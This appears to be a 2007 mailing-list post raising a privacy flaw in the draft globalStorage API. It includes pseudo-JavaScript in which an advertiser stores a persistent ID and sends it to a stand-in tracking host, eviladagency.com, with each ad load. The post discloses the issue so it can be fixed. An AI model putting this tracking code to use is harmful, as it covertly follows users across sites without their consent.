- From: Jerason Banes <jbanes@gmail.com>
- Date: Thu, 31 May 2007 00:13:56 -0500
Hello All! This is my first post here, so apologies in advance if I'm not quite up on the list etiquette.

I was just comparing the Storage API with that of Google Gears <http://gears.google.com>, and something jumped out at me. According to the spec, browsers should allow a webapp to store data in the globalStorage object with no domain attached (i.e. globalStorage['']). This is intended to allow data to be shared across all webpages.

My concern is that this poses a problem for the user's privacy. Let's say that I'm an Evil Advertisement site. It is in my interest to penetrate the user's veil of privacy and determine which pages they visit. I've traditionally used cookies for this, but the browser makers foiled my attempts by allowing cookies to only be accepted from the originating site. But thanks to the new globalStorage API, I can store a Unique ID in the user's browser, then use Javascript to retrieve it every time they download one of my ads.

Here's some rough pseudo-JS to demonstrate how it might work:

<script>
// Mint the identifier once; every later page load reads the same value back
if (!globalStorage[''].evilbit) globalStorage[''].evilbit = createUUID();

function createUUID() {
  // return a unique identifier using a random algorithm
  return crypto.randomUUID();
}

function displayEvilAd(type) {
  document.write('<img src="http://www.eviladagency.com' +
    '/getAdvertisement.asp' +
    '?type=' + type +
    '&tracking=' + globalStorage[''].evilbit + '">');
}
</script>
...
<script>displayEvilAd("banner");</script>

Is there something I'm missing that would prevent this?

Thanks,
Jerason Banes
Received on Wednesday, 30 May 2007 22:13:56 UTC